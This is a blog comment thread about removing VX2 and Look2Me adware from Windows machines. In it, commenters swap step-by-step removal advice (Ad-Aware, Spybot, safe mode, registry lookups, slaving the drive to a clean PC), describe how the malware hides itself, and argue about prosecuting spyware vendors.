            If you get into Safe Mode instead, open up My Computer and look through the drives and folders there for the program you wrote down. If you can’t see it, you may have to change some of the settings under Tools…Folder Options…View until you can see it. Then click on that file and delete it, and make sure to empty your Recycle Bin too. Then restart and run Spybot one last time.

            If you have any problems with this, go ahead and post again. Hope this helps!

        • One potential problem: Some variants of VX2 conceal themselves so that they don’t show up in the Task Manager.

          It’s also memory-resident, meaning that if you wipe out the files on disk, it’s still running in RAM, and just writes itself back to disk again.

          Ad-Aware has a VX2 plugin tool which sometimes works. I’d suggest downloading Ad-Aware and the VX2 plugin from http://www.lavasoft.de and then restarting the computer in “safe mode.” Run the Ad-Aware VX2 plugin, then immediately run Ad-Aware, then turn off the computer (to kill anything memory resident), turn it on, boot in Safe Mode again, and run both the VX2 tool and Ad-Aware again.

          • Conceal itself from the NT/2K/XP Task Manager? I’d love to see that. I’ve had several programs claim they could do this, but they only seemed to manage this on 9x-based systes.
            That, and I prefer to use SysInternals’ version of the Task Manager, anyway, which seems to see everything as well.

          • The deal is, we’re only half finished. After you find the source of the problem, get into the recovery console with the command prompt only, and get rid of the problem files. In safe mode, with no GUI, you minimize the chance that VX2 or something like it is running.

            Then you get back into Windows. The registry tags that try to load your problem are still there, but the files are missing, so nothing gets loaded. Then you run your anti-virals, anti-spyware and registry cleaners.

            This won’t get everything but it will take care of most problems that Ad-Aware, Spybot, or your anti-virus program don’t see. If it’s beyond this, it’s certainly beyond my ability to walk a user through the process remotely.

        • Just pop over to Spywareinfo and we’ll see what we can do for you. They’re the ones the invented the manual fix for this stuff.

          http://forums.spywareinfo.com

          On a side note, Linkey.ru is also where the CWS strain that used the HackerDefender rootkit was hosted – it’s the host for the Outhost.info strain. They’re up to their neck in illegal activities.

  66. You, sir, are a hero. Will lin k to this in my LJ.

    On a related note, I am one of those guys who always thought a firewall and antivirus were everything you ever need, so after reading this piece I was worried about spyware infection and immediately grabbed both Ad-Aware and Spybot S&D. I was a bit miffed to find out that the ‘Alexa’ entry in my registry was still there (XP-Antispy was supposed to have killed it), but apart from that, my machine is clean. Go me!

    I heartily recommend ZoneAlarm to everybody πŸ™‚

  67. You, sir, are a hero. Will lin k to this in my LJ.

    On a related note, I am one of those guys who always thought a firewall and antivirus were everything you ever need, so after reading this piece I was worried about spyware infection and immediately grabbed both Ad-Aware and Spybot S&D. I was a bit miffed to find out that the ‘Alexa’ entry in my registry was still there (XP-Antispy was supposed to have killed it), but apart from that, my machine is clean. Go me!

    I heartily recommend ZoneAlarm to everybody πŸ™‚

  68. Thanks for the indepth piece on this problem.

    For the longest time I could NOT get rid of the damn thing (I had a version from second thought which would install a desktop icon and run a URL tracker). I just deleted ALL my cookies and reran both my spyware programs and deleted the programs it installs. I’m hoping I finally got rid of this bastard.

  69. Thanks for the indepth piece on this problem.

    For the longest time I could NOT get rid of the damn thing (I had a version from second thought which would install a desktop icon and run a URL tracker). I just deleted ALL my cookies and reran both my spyware programs and deleted the programs it installs. I’m hoping I finally got rid of this bastard.

  70. Yeah, as tacit said, unlikely. I’m a network systems analyst at a managed security services provider, and I can tell you from personal experience that spam and spyware does not get prosecuted; the FBI is just not interested in crimes that cause such little tangible damage. Now, if you can show that it infected a bank or a government institution and caused actual financial loss, then their ears perk up. That, or if there’s child porn involved. It’s scary how quickly the FBI will jump on a case involving child porn. But for general spyware and adware cases like described above, they won’t do anything. Very good writeup BTW.

  71. Which version of Windows do you use?

    My mother was infected with something very similar just a few weeks ago. I or somebody else listening could probably walk you through the steps to get rid of your problem.

  72. –First off, I don’t know you and I don’t know what you know, so I have to assume from the start that you don’t know anything. If I’m insulting your intelligence, I apologize–

    Okay… first thing you should do is open up a browser window to this site.

    This is what we’ll use to find the problem in the first place. If you have a second computer in your house, you should use the uninfected computer to go to this site. If not, we’ll just have to make do.

    Next, hit the “Ctrl”, “Alt” and “Del” buttons at the same time. A menu should come up on your screen with about six buttons. One of them should be called ‘Task Manager’. Click on that button and another window comes up. There should be three tabs towards the top – ‘Applications’, ‘Processes’ and ‘Performance’. We want to click on the one named ‘Processes’.

    Make sure you have a piece of paper and a pencil for the next part. In the first column in your Task Manager window should be a big list of names. These are all the ‘processes’, which mean all the programs that are currently running on your computer. The bad programs causing your problems are in here somewhere. Your web page is open to the Process Library, a site that tries to catalog every process from every program there is. It’s not complete, but it’s a good place to start.

    Look at the first process name in your task manager window, I want you to type that name into the search engine at Process Library. It’s that big blue box that says ‘Search for a Process’. Hit the ‘Search Now!’ button, and if there is an entry for your process, it will be displayed.

    Look at the description of the process. If it says your process ‘is a part of the Microsoft Windows Operating System”, then we know it’s ok. If it says that it’s related to some piece of software that you know you’ve got on your computer, or some piece of hardware that you know you have (like your printer), that’s ok too. If it says that the process is related to a known virus, write the name down. If it can’t find the process in the library, write that down too. If it says that a process belongs to something that you don’t think is on your computer, write that down too.

    Go through the whole list of processes like this, and write down the names of every one that look suspicious.

    Post that list as a response here, or email it to me, or post it as a comment on my journal.

  73. One potential problem: Some variants of VX2 conceal themselves so that they don’t show up in the Task Manager.

    It’s also memory-resident, meaning that if you wipe out the files on disk, it’s still running in RAM, and just writes itself back to disk again.

    Ad-Aware has a VX2 plugin tool which sometimes works. I’d suggest downloading Ad-Aware and the VX2 plugin from http://www.lavasoft.de and then restarting the computer in “safe mode.” Run the Ad-Aware VX2 plugin, then immediately run Ad-Aware, then turn off the computer (to kill anything memory resident), turn it on, boot in Safe Mode again, and run both the VX2 tool and Ad-Aware again.

  74. Because it’s not a priority.

    They can barely be bothered to do anything about identity theft, phishing sites, advanced-fee scams, and pyramid schemes; it’s simply not a priority.

  75. Now we could make cracks about Way of the Moose, or Ki-YAI-eh? here, but we won’t. Because we’re far too civilized for such juvenile nonsense.

    We have our own brand of nonsense to use.

    *ponders a Leslie Neilson movie: Spy-ware*

  76. Re: Viewing HTML Source Safely

    (Edit…)
    One of the safest ways to view HTML code is to use something such as, say, telnet. That way, you see the code as it is.
    I’ve coded my own program, CodeFetch, that’ll allow the viewing of any HTML page – just enter the URL and go. It’s a simple thing I made in VB (No, it doesn’t use Inet, it uses Winsock).
    So far, I’ve had no problems with it (not that there really could be any, considering the way it works).

    Oops, I should’ve read the whole thing first… I forgot about Lynx’s -head option…

    • That’s unfortunate. It seems common, though. The legal system tends to move slowly in any country, whereas technology moves very quickly; computers and the Internet have created entire new classes of criminal activity that quite literally didn’t exist a decade or two ago.

      • Indeed it is, on both counts.
        Our copyright laws are lax too, apparently. The problem is, the government’s pretty much swelled up with too many problems to try and start revising laws. =/
        Or maybe it’s the other way around…

  77. Conceal itself from the NT/2K/XP Task Manager? I’d love to see that. I’ve had several programs claim they could do this, but they only seemed to manage this on 9x-based systes.
    That, and I prefer to use SysInternals’ version of the Task Manager, anyway, which seems to see everything as well.

  78. The deal is, we’re only half finished. After you find the source of the problem, get into the recovery console with the command prompt only, and get rid of the problem files. In safe mode, with no GUI, you minimize the chance that VX2 or something like it is running.

    Then you get back into Windows. The registry tags that try to load your problem are still there, but the files are missing, so nothing gets loaded. Then you run your anti-virals, anti-spyware and registry cleaners.

    This won’t get everything but it will take care of most problems that Ad-Aware, Spybot, or your anti-virus program don’t see. If it’s beyond this, it’s certainly beyond my ability to walk a user through the process remotely.

  79. If you read between the lines, what Rackspace is saying is:

    “Yes, we know our client is planting adware on people’s computers. Yes, we support and condone this behavior. We will not terminate our client; instead, we’ll just ask you to ask the client for adware removal software.”

    The problem is, Rackspace’s dirty client is planting the spyware using redirectors and Explorer security vulnerabilities, and hiding the source o fthe adware by redirecting through servers in other countries. Anyone who lacks the technical skill (and the six hours of work) required to track the infection down to the Rackspace client would never know to contact Rackspace’s client for the removal tool.

    Rackspace knows what their client is doing. they know their client is planting adware. They know their client is taking incredible measures to conceal his identity. they know their client is planting the adware using Explorer exploits. They don’t care; they do not consider this activity “abuse,” and they do not terminate people for doing this. Therefore, Rackspace is dirty.

  80. That’s unfortunate. It seems common, though. The legal system tends to move slowly in any country, whereas technology moves very quickly; computers and the Internet have created entire new classes of criminal activity that quite literally didn’t exist a decade or two ago.

  81. If you read between the lines […]
    If you do, you assume. If you assume, your arguments are null and void as they are not based on facts, but assumptions.
    I understand what you’re saying, but unless you try to follow at the very least, you can’t even do anything about them but rant and rave.
    And what’s that going to do? Don’t waste your time; make it count. They can be brought to court.

  82. Indeed it is, on both counts.
    Our copyright laws are lax too, apparently. The problem is, the government’s pretty much swelled up with too many problems to try and start revising laws. =/
    Or maybe it’s the other way around…

  83. sorry for being a noob, but I read through all the comments and threads, and I can’t find the answer I’m looking for (which could be due to sleep deprivation, but I thought I’d ask anyway):

    How did you finally get rid of the problem on shelly’s computer?

    I downloaded adaware’s vx2 plugin and it doesn’t even find anything, but I still have the problem.

    • If the VX2 plugin doesn’t find anything, then either you have something other than VX2, or you have a new variant of VX2 that the anti-spyware software doesn’t know about yet.

      I eventually had to fix the problem on her computer by removing the hard drive, putting it in my computer, running anti-spyware software from my machine, then using a Registry cleaner tool on it. Big pain in the ass. Had I not had another computer to use, it would’ve been next to impossible.

      • can you run a regcleaner on a slaved drive? what util do you use if I may ask?

        Logic tells me that backing up my wife’s music and family photos, wiping the drive, and starting over would have taken less time… but I guess I’m obstinate that way.

        Thanks for your advice.

      • I really hate to be a pain in the ass, and I’m sure you have better things to do than provide free support to a stranger, but I could really use your help.

        I tried your suggestion, but none of the utilities I normally use are capable of scanning the registry on the slaved drive (adaware, spybot, hijackthis, regcleaner). Can you tell me what utilities you used, and any custom configurations you had to implement? Any assistance would be appreciated.

        • I don’t recall the name of the registry cleaner offhand, but her machine was running Windows 2000, which keeps “blank” Registry files that can be recovered either by renaming the files in the Registry hive or by using the Windows 2000 Recovery Console. What I did was renamed the files in her Registry hive, then copied the “blank” Registry files, which allowed Windows to start up normally but without any of her device drivers. I then used a third-party Registry tool to clean the old Registry hive and merge it back into the new Registry hive.

          Since then, I’ve discovered an easier, although arguably drastic, way to get rid of VX2:

          1. Run Ad-Aware. It will identify the VX2 files, which typically live in /windows/system32.

          2. Immediately on seeing the report, write down the path to the VX2 files, then pull the plug on the computer. Don’t use Ad-Aware to try to get rid of VX2; it monitors the Registry and rewrites itself with different names when Ad-Aware attempts to clean it. Don’t power down gracefully; VX2 changes the name of its own files randomly on shutdown.

          3. Install the hard drive in another, known-clean computer. Delete the VX2 files from the hard drive. (You can’t do this while the original computer hosting the infection is running, because the files are tagged as being in use.)

          4. Reinstall the hard drive in the original computer; VX2 should now be gone.

          • another possible approach…

            after you’ve identified the files with ad aware and pulled the plug.. perhaps you can boot from a Knoppix CD and then use its tools to delete the files.. thus avoiding having to remove the hard drive.. I guess Ill have to take a look at my knoppix CD to see if it has any file utlities on it I might use to delete the VX2 files..

  84. sorry for being a noob, but I read through all the comments and threads, and I can’t find the answer I’m looking for (which could be due to sleep deprivation, but I thought I’d ask anyway):

    How did you finally get rid of the problem on shelly’s computer?

    I downloaded adaware’s vx2 plugin and it doesn’t even find anything, but I still have the problem.

  85. If the VX2 plugin doesn’t find anything, then either you have something other than VX2, or you have a new variant of VX2 that the anti-spyware software doesn’t know about yet.

    I eventually had to fix the problem on her computer by removing the hard drive, putting it in my computer, running anti-spyware software from my machine, then using a Registry cleaner tool on it. Big pain in the ass. Had I not had another computer to use, it would’ve been next to impossible.

  86. can you run a regcleaner on a slaved drive? what util do you use if I may ask?

    Logic tells me that backing up my wife’s music and family photos, wiping the drive, and starting over would have taken less time… but I guess I’m obstinate that way.

    Thanks for your advice.

  87. I really hate to be a pain in the ass, and I’m sure you have better things to do than provide free support to a stranger, but I could really use your help.

    I tried your suggestion, but none of the utilities I normally use are capable of scanning the registry on the slaved drive (adaware, spybot, hijackthis, regcleaner). Can you tell me what utilities you used, and any custom configurations you had to implement? Any assistance would be appreciated.

  88. I FINALLY did it

    Sorry it’s taken me so long to actually DO this… it’s been Finals, and you can imagine how hectic it has been. Firstly, thank you very much for your patient indications, I followed through and found the following:

    Processes Not found in Library:
    WPC54CFG.exe
    OdHost.exe
    TabUserW
    ScannerFinder.exe (I suspect this may be tied to my Microtek scanner?)
    NICServ.exe

    Spyware Found (which Spybot seems to have failed to remove):
    ViewMgr.exe (ViewPoint Media Player)

    No mention of VX2, though– and today Spybot , for the first time, eliminated VX2 from its list of bogies without telling me it couldn’t remove this or that component related to it. However, it seems to have passed VMP by.
    I wait for your feedback. And thanks again πŸ™‚

  89. Re: I FINALLY did it

    Okay… I’m looking in a few other places for details on your processes…

    WPC54CFG.exe is a utility used by the Linksys Wireless-G Notebook adapter. OdHost.exe and NICServ.exe are also associated with this piece of hardware. If you have one of these, then these processes are ok.

    TabUserW is a driver for a Wacom pen tablet. Same as above.

    ScannerFinder.exe is, as you suspected, related to your Microtek scanner.

    If Spybot got rid of VX2 for you, then looks like ViewMgr.exe is the only remaining problem.

    This next part is a bit dangerous for normal users. Print this out, and do exactly what it says.

    Click the Start button, then click Run and type in ‘regedit’ in the box that comes up. This is the Registry Editor. You don’t want to make any changes here – if you change the wrong values, you make your applications or even your entire operating system stop working.

    There should be two panes in the regedit window. At the very top of the left pane, there should be a little computer icon that says ‘My Computer’ next to it. Click on that one to highlight it, then in the Menu bar click Edit, then Find. In the box that comes up, type in ‘ViewMgr’, and click ‘Find Next’.

    It might take a minute to find the entry, and there may be more than one. You can use the F3 key to find the next entry. The registry entry you’re looking for should be in a folder named ‘Run’. (The folders are in the left pane.) In the right pane you should see several columns. If you’ve got the right entry, ViewMgr should appear under ‘Name’. Under ‘Data’ should be the complete name and path of a program. Write it down. Everything from “C:\(whatever)” to “\(whatever).exe”. When you’ve written down this file name, click ‘Registry’ and ‘Exit’ in the Menu bar without making any changes.

    Next you need to reboot. While your computer is booting, hit F8 repeatedly. This should bring us a text menu with several different booting options. If the menu doesn’t come up, reboot and try again. When the menu comes up, what we want is an entry that says something like “Recovery Console with Command Prompt Only” or possibly “Safe Mode with Command Prompt”. If there’s nothing like that there, we can probably make due with the option that says “Safe Mode”.

    If you can get the command prompt option, you’ll boot to a simple black screen with words on it, just like an old DOS computer. Type in “DEL”, then a space, then that whole name you wrote down earlier. It should be something like “DEL C:\(directory names)\(program).exe”. Type that in exactly, and hit return. Then restart the computer again (just hit the reset button, or turn it off and back on again), and run Spybot one last time. Everything should be ok.

    If you get into Safe Mode instead, open up My Computer and look through the drives and folders there for the program you wrote down. If you can’t see it, you may have to change some of the settings under Tools…Folder Options…View until you can see it. Then click on that file and delete it, and make sure to empty your Recycle Bin too. Then restart and run Spybot one last time.

    If you have any problems with this, go ahead and post again. Hope this helps!

  90. Re: Viewing HTML Source Safely

    Mmh. Someone asked me to post the source code of CodeFetch, but I can’t reply to their comment yet (due to it still being screened), so I’ll just write my reply here.

    All you need is a Winsock control. Read the help for that control, it contains some valuable information on how to use and control it. Then all you need is to open a connection (TCP, port 80) and send the command and other HTTP headers:
    Winsock.SendData “GET ” & URL(1) & ” HTTP/1.1″ & vbCrLf
    Winsock.SendData “Host: ” & URL(0) & vbCrLf
    Winsock.SendData vbCrLf
    Other headers you can send are Accept, Cache-control, Connection, User-Agent, Host, etc.. Remember to end with a CR+LF combination (DON’T use vbNewLine) otherwise the server’ll sit there, waiting for the rest of the data (and possibly just close the connection on you). I suggest that you set both User-Agent (to the name of your app, along with version, notes, URL, etc.) and the Host (the domain you’re trying to reach – important, because otherwise you might, for example, get the index of http://www.yahoo.com instead of mail.yahoo.com).
    All data that you receive, you can just plop into a textbox of some kind.

    For more information, you should read the RFC for the HTTP protocol:
    http://www.google.ca/search?hl=en&q=RFC+HTTP

  91. Article

    Good article but i don’t a preciate the crude language and missplellings. They’re unprofesional and rude. Thank-you.

  92. Article

    Good article but i don’t a preciate the crude language and missplellings. They’re unprofesional and rude. Thank-you.

  93. I don’t recall the name of the registry cleaner offhand, but her machine was running Windows 2000, which keeps “blank” Registry files that can be recovered either by renaming the files in the Registry hive or by using the Windows 2000 Recovery Console. What I did was renamed the files in her Registry hive, then copied the “blank” Registry files, which allowed Windows to start up normally but without any of her device drivers. I then used a third-party Registry tool to clean the old Registry hive and merge it back into the new Registry hive.

    Since then, I’ve discovered an easier, although arguably drastic, way to get rid of VX2:

    1. Run Ad-Aware. It will identify the VX2 files, which typically live in /windows/system32.

    2. Immediately on seeing the report, write down the path to the VX2 files, then pull the plug on the computer. Don’t use Ad-Aware to try to get rid of VX2; it monitors the Registry and rewrites itself with different names when Ad-Aware attempts to clean it. Don’t power down gracefully; VX2 changes the name of its own files randomly on shutdown.

    3. Install the hard drive in another, known-clean computer. Delete the VX2 files from the hard drive. (You can’t do this while the original computer hosting the infection is running, because the files are tagged as being in use.)

    4. Reinstall the hard drive in the original computer; VX2 should now be gone.

  94. If it’s DSO Exploit that keeps popping up, that’s a bug in Spybot. It flags an insecure registry value that Microsoft has long since patched, but then it changes it to a value that’s perfectly safe but isn’t the value it’s looking for, so it keeps finding it and fixing it wrong. Upgrade to the latest Spybot, the problem was fixed not too long ago. But it was never actually a risk as long as you’ve kept up with updates to Windows and IE.

    And yeah, I know your comment is old, but I just stumbled across this entry because someone linked to it in the spywareinfo.com forums. ^_^;

  95. Just pop over to Spywareinfo and we’ll see what we can do for you. They’re the ones the invented the manual fix for this stuff.

    http://forums.spywareinfo.com

    On a side note, Linkey.ru is also where the CWS strain that used the HackerDefender rootkit was hosted – it’s the host for the Outhost.info strain. They’re up to their neck in illegal activities.

  96. another possible approach…

    after you’ve identified the files with ad aware and pulled the plug.. perhaps you can boot from a Knoppix CD and then use its tools to delete the files.. thus avoiding having to remove the hard drive.. I guess Ill have to take a look at my knoppix CD to see if it has any file utlities on it I might use to delete the VX2 files..

  97. Great article; these guys are lower than low.

    Last night I went through virtually the same ordeal with VX2. The primary villain from what I could discern was NicTech Networks. They kept redirecting to a “security website” and warning me that SpyWare was installed on my PC and I should install their software to remove it. I too ran all the cleaners I could and I tried to clean it manually in the Registry and by deleting files (morphing DLLs that I couldn’t delete because they had them locked). In the end I did a system restore back to January 1 and that removed the driver (I think that’s what it is — a SYS file (?)) and it appears to be fixed.

    I do hope these losers get what they’ve got coming eventually. I was up ’til 4:00 AM dealing with this. They stole sleep from me and caused unnecessary stress. I think it’s time to implement the Death Penalty for spyware!

  98. Great article; these guys are lower than low.

    Last night I went through virtually the same ordeal with VX2. The primary villain from what I could discern was NicTech Networks. They kept redirecting to a “security website” and warning me that SpyWare was installed on my PC and I should install their software to remove it. I too ran all the cleaners I could and I tried to clean it manually in the Registry and by deleting files (morphing DLLs that I couldn’t delete because they had them locked). In the end I did a system restore back to January 1 and that removed the driver (I think that’s what it is — a SYS file (?)) and it appears to be fixed.

    I do hope these losers get what they’ve got coming eventually. I was up ’til 4:00 AM dealing with this. They stole sleep from me and caused unnecessary stress. I think it’s time to implement the Death Penalty for spyware!

  99. great research. i don’t know a lot about computers, but i know mine is infected with some variant form of vx2. none of my spyware and virus programs will get rid of this, they just state the ovious and tell me i have vx2!!! (c:\WINDOWS\system32\166o0gj3e6o.dll)my ad-ware plug in shows that my system is clean. my computer will not let me restore, search file and folders, and my nortan has been lost somewhere where my computer’s never never land. i’ve tried spyware s&d, cw shredder, and a number of other products who give you a free download to state the obvious and then want $29.99. now what elce is there for me to do? i wonder what i should do now? will a system reboot do the trick?

    • One of the problems with the newest VX2 variants is that they make themselves system processes, so they load even if you start the computer in safe mode. Rebooting won’t get rid of them.

      The easiest way I have found to get rid of VX2 is kind of drastic, and requires a second computer:

      1. Run Ad-Aware. Write down the list of files it reports, but don’t tell them to delete the files. The files change their names periodically, so you have to get a current list.

      2. Pull the plug on the computer to shut it down. you can’t use the Shut Down command, because VX2 changes the names of the files every time you do.

      3. Put the hard drive into another computer, that is known to be clean, and delete the VX2 files from the hard drive. You have to do it that way because you can’t boot from the hard drive; if you do, you can’t delete the VX2 files.

      It’s obnoxious, but it’s worked for me.

      • Wouldn’t a live Linux CD work, too?

        To make this process a little easier, couldn’t you go ahead and do the following in this order?

        1. Run Ad-Aware but have it NOT delete the files
        2. Insert a live Linux CD
        3. Unplug the computer when Ad-Aware is done
        4. Plug it back in, booting to the live CD

        Would that work?

    • I think Symantec fixed my LOOK2ME

      I had all the symptoms described before, and mine had latched onto explorer.exe and winlogon.exe. I tried all the tools mentioned, but I think the actual fixer was a simple program by Symantec. The link is:
      http://securityresponse.symantec.com/avcenter/expanded.threats.tools.list.html

      Then select Spyware.Look2Me

      This was particularly helpfull in my case, with a corporate laptop with techsupport itching to format my drive, and no administrator user, no WinXP bootdisks to boot to the recovery console, etc.

      It’s worth a try…

  100. great research. i don’t know a lot about computers, but i know mine is infected with some variant form of vx2. none of my spyware and virus programs will get rid of this, they just state the ovious and tell me i have vx2!!! (c:\WINDOWS\system32\166o0gj3e6o.dll)my ad-ware plug in shows that my system is clean. my computer will not let me restore, search file and folders, and my nortan has been lost somewhere where my computer’s never never land. i’ve tried spyware s&d, cw shredder, and a number of other products who give you a free download to state the obvious and then want $29.99. now what elce is there for me to do? i wonder what i should do now? will a system reboot do the trick?

  101. One of the problems with the newest VX2 variants is that they make themselves system processes, so they load even if you start the computer in safe mode. Rebooting won’t get rid of them.

    The easiest way I have found to get rid of VX2 is kind of drastic, and requires a second computer:

    1. Run Ad-Aware. Write down the list of files it reports, but don’t tell them to delete the files. The files change their names periodically, so you have to get a current list.

    2. Pull the plug on the computer to shut it down. you can’t use the Shut Down command, because VX2 changes the names of the files every time you do.

    3. Put the hard drive into another computer, that is known to be clean, and delete the VX2 files from the hard drive. You have to do it that way because you can’t boot from the hard drive; if you do, you can’t delete the VX2 files.

    It’s obnoxious, but it’s worked for me.

  102. prosecution of aliens

    anyone who lives outside of the USA that does quantifiable damage to a US citizen or his property is subject to US federal law. While not a computer law expert, there is probably some theory of torts that would apply. These malcontents must file responses or be subject to summary judgment (you win by a motion for their failure to respond). If the number of suits were in the hundred of thousands, their legal fees would be astronomical, taking the incentive out of their bad minded motives…… It costs about $225 to start a case in federal court, which is part of the money available in recovery. Of course, the court where the damage was done (your house)is the proper court, so it is unlikely that one law firm could battle all the suits.

    • Re: prosecution of aliens

      A small comment: how you will enforce the court’s judgment in Ulan Bator (for example) ? Or are you thinking of the SBP ?

      Even if you didn’t know yet, but the US is *** just a part *** of the world πŸ˜‰

      • Re: prosecution of aliens

        The US is just “part” of the world?

        Please…. Ok, all the countries who have been to the moon, raise your hands.

        (Counts ONE)

        Ok, the rest of you are THIRD WORLD COUNTRIES.

        ‘Nuff said.

  103. prosecution of aliens

    anyone who lives outside of the USA that does quantifiable damage to a US citizen or his property is subject to US federal law. While not a computer law expert, there is probably some theory of torts that would apply. These malcontents must file responses or be subject to summary judgment (you win by a motion for their failure to respond). If the number of suits were in the hundred of thousands, their legal fees would be astronomical, taking the incentive out of their bad minded motives…… It costs about $225 to start a case in federal court, which is part of the money available in recovery. Of course, the court where the damage was done (your house)is the proper court, so it is unlikely that one law firm could battle all the suits.

  104. Re: prosecution of aliens

    A small comment: how you will enforce the court’s judgment in Ulan Bator (for example) ? Or are you thinking of the SBP ?

    Even if you didn’t know yet, but the US is *** just a part *** of the world πŸ˜‰

  105. Bargain Buddy

    about that bargain buddy mentioned, microsoft antispyware said it had got on my computer and prevented it from running and was able to easily remove it. I have proadaware and spybot and they both are very good products however I think microsofts’s program has them both beat.
    And it’s free πŸ™‚ Also, I have occassionally had a pop-up and like it was said, it was usually for some pop-up blocker or something similar, now why would anybody buy a product from any company that resorts to that type of advertising, and especially when they are trying to sell you a product to prevent such from happening!! At least that what goes across my mind when I see those types of products in a pop-up. Thanks for the info, πŸ™‚

  106. Bargain Buddy

    about that bargain buddy mentioned, microsoft antispyware said it had got on my computer and prevented it from running and was able to easily remove it. I have proadaware and spybot and they both are very good products however I think microsofts’s program has them both beat.
    And it’s free πŸ™‚ Also, I have occassionally had a pop-up and like it was said, it was usually for some pop-up blocker or something similar, now why would anybody buy a product from any company that resorts to that type of advertising, and especially when they are trying to sell you a product to prevent such from happening!! At least that what goes across my mind when I see those types of products in a pop-up. Thanks for the info, πŸ™‚

  107. what if….

    wat if you use firefox will you get infected or maybe opera becasue i use both of those and took of ie from my computer.

    • Re: what if….

      This particular vulnerability affects only Internet Explorer, as it exploits an iFrame security hle common (as far as I can tell) only in Explorer. That doesn’t mean there aren’t any exploits affecting browsers such as Opera or Firefox, but this one doesn’t appear to be one of them.

  108. what if….

    wat if you use firefox will you get infected or maybe opera becasue i use both of those and took of ie from my computer.

  109. Re: what if….

    This particular vulnerability affects only Internet Explorer, as it exploits an iFrame security hle common (as far as I can tell) only in Explorer. That doesn’t mean there aren’t any exploits affecting browsers such as Opera or Firefox, but this one doesn’t appear to be one of them.

  110. I think Symantec fixed my LOOK2ME

    I had all the symptoms described before, and mine had latched onto explorer.exe and winlogon.exe. I tried all the tools mentioned, but I think the actual fixer was a simple program by Symantec. The link is:
    http://securityresponse.symantec.com/avcenter/expanded.threats.tools.list.html

    Then select Spyware.Look2Me

    This was particularly helpfull in my case, with a corporate laptop with techsupport itching to format my drive, and no administrator user, no WinXP bootdisks to boot to the recovery console, etc.

    It’s worth a try…

  111. THANK YOU!

    first off, you’re my new hero. thank you so much! half the stuff you named in your article was on my computer, well over 50 NicTech applications, plus a bunch of other stuff, it was frightenning. now i know why my computer’s been so messed up and i get millions of popins and files trying to download constantly w/out permission. i definitely have a vx2. keep fighting the good fight!

  112. THANK YOU!

    first off, you’re my new hero. thank you so much! half the stuff you named in your article was on my computer, well over 50 NicTech applications, plus a bunch of other stuff, it was frightenning. now i know why my computer’s been so messed up and i get millions of popins and files trying to download constantly w/out permission. i definitely have a vx2. keep fighting the good fight!

  113. Wow, great article and great detective work! I found it from one of the moderators at cexx.org linking you on the message boards.

    These guys & their ever-mutating flagship malware really get around. Doxdesk and I dug some dirt on these b***ards in ’01 thanks largely to poor security practices on their part, but I kind of lost sight of them after that. It’s sad to see that they’re still alive and kicking after all this time. πŸ™

  114. Wow, great article and great detective work! I found it from one of the moderators at cexx.org linking you on the message boards.

    These guys & their ever-mutating flagship malware really get around. Doxdesk and I dug some dirt on these b***ards in ’01 thanks largely to poor security practices on their part, but I kind of lost sight of them after that. It’s sad to see that they’re still alive and kicking after all this time. πŸ™

  115. Now, more than ever, EVERYONE needs this tool

    A great little program I have used for years automatically backs up the registry each time the system boots and lets you restore that backup in less than two minutes. It is named ERUNT, written by Lars Hederer and a page I have written on it is here: http://www.computer-help.net/Best-Registry-Backup.html
    Get it before you are infested with almost anything and you can evict the bad guy(s) with click, click, and reboot.

  116. Now, more than ever, EVERYONE needs this tool

    A great little program I have used for years automatically backs up the registry each time the system boots and lets you restore that backup in less than two minutes. It is named ERUNT, written by Lars Hederer and a page I have written on it is here: http://www.computer-help.net/Best-Registry-Backup.html
    Get it before you are infested with almost anything and you can evict the bad guy(s) with click, click, and reboot.

  117. More on Look2Me

    There is now a new addition to one part of this story. NicTech Networks is responsible for a new version of their own Look2ME ADware program (also known as the W32.Canbebe Trojan). Their new code (March 15, 2005) is a random named stealth DLL that serves up ADs and hides itself well.

    There is no indication of this new version being present in Ad-Aware, Spybot or HijackThis logs. Its DLL does not show up in folder displays or Directory listing. The only clue a user has that it is present on a system is the popup ADs and the observation that Explorer does not show up in the Task List, making it difficult to kill Explorer so you can remove this DLL if you just happen to find the random named DLL. There is a different version of the module for Windows 98/ME and NT/XT. And older removal tools do not seem to work with it.

    This new version comes complete with a valid Digital Signature issued to NicTech Networks by Thawte Code Signing CA. This is viewable by checking its properties should you manage to find the DLL module.

    The DLL can download updates from http://www.a-d-w-a-r-e.com servers, and appears to have a backdoor in it. If you have a software Firewall blocking Explorer from accessing the Internet, it has been reported to popup a window asking if you would like to download an “update DLL” for the program you just installed. For some like Ad-Aware and Spybot, it displays the program name and it web site URL.

    Despite being very stealth and will hidden, you can find its DLL module name(s) by using the Search function. Search for *.DLL and in the Containing text: NicTech Networks

    The good news is, some of the major Anti-Virus providers now have copies of this module and a few like CA eTrust already detect it and can remove it.

    CA eTrust W32.Canbebe Trojan

  118. More on Look2Me

    There is now a new addition to one part of this story. NicTech Networks is responsible for a new version of their own Look2ME ADware program (also known as the W32.Canbebe Trojan). Their new code (March 15, 2005) is a random named stealth DLL that serves up ADs and hides itself well.

    There is no indication of this new version being present in Ad-Aware, Spybot or HijackThis logs. Its DLL does not show up in folder displays or Directory listing. The only clue a user has that it is present on a system is the popup ADs and the observation that Explorer does not show up in the Task List, making it difficult to kill Explorer so you can remove this DLL if you just happen to find the random named DLL. There is a different version of the module for Windows 98/ME and NT/XT. And older removal tools do not seem to work with it.

    This new version comes complete with a valid Digital Signature issued to NicTech Networks by Thawte Code Signing CA. This is viewable by checking its properties should you manage to find the DLL module.

    The DLL can download updates from http://www.a-d-w-a-r-e.com servers, and appears to have a backdoor in it. If you have a software Firewall blocking Explorer from accessing the Internet, it has been reported to popup a window asking if you would like to download an “update DLL” for the program you just installed. For some like Ad-Aware and Spybot, it displays the program name and it web site URL.

    Despite being very stealth and will hidden, you can find its DLL module name(s) by using the Search function. Search for *.DLL and in the Containing text: NicTech Networks

    The good news is, some of the major Anti-Virus providers now have copies of this module and a few like CA eTrust already detect it and can remove it.

    CA eTrust W32.Canbebe Trojan

  119. VX2 infection

    I just got a VX2 infection on an old win98 computer by another mechanism. The computer has all the updates, but I know that MSFT no longer supports win98 even though they claim to provide security updates. While simply sitting idle, with only eudora, an open ie window and seti at home running, something crashed in and caused an error page to come up (general exception fault). On re-boot, windows said that “it was updating my settings” a sure sign that something was just installed. Sure enough, Ad-Aware found VX2, and was able to remove it (or so it says). Another computer on the same home network running XP SP2 did not get infected. There must be variants of VX2 that use buffer overruns or some other generated error to install itself.

    • Re: VX2 infection

